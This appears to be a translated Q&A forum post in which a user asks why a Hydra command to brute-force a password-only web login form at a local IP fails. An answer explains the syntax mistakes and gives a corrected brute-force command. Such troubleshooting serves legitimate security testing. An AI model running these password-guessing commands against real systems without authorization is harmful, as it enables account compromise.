hydra http://192.168.0.24:1234/ http-form-post "/password=^PASS^:Invalid password!" -P pass.txt -t 10 -o hydra-http-post-attack.txt
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2018-01-03 12:12:37
[INFO] Using HTTP Proxy: http://127.0.0.1:8080
[ERROR] the variables argument needs at least the strings ^USER^ or ^PASS^: Invalid password!
我不確定為什麼會收到錯誤,因為有字串^PASS^。應用程式上沒有用戶名。
登入表單的完整 URL 為:http://192.168.0.24:1234/
有人可以幫忙嗎?
答案1
關於你的問題:
- 使用九頭蛇時,不需要將其放在
http://要攻擊的宿主之前。 - 若要指定端口,請使用
-s標誌。 - 您需要指定
-l標誌,否則會顯示錯誤。 - 在 POST 請求中,您必須指定將接收 POST 請求的文件(例如,index.php、password.php、validate.php 等)
- 最後但並非最不重要的一點是,您必須指定成功案例或失敗案例。
嘗試以下命令,這是我能根據提供的資訊做的最好的事情:
hydra -l '' -P pass.txt 192.168.0.24 -s 1234 http-post-form "/index.php:pass=^PASS^:F=Invalid Password!" -t 10 -o hydra-http-post-attack.txt
我自己嘗試過,它不會產生任何類型的錯誤。
祝你好運!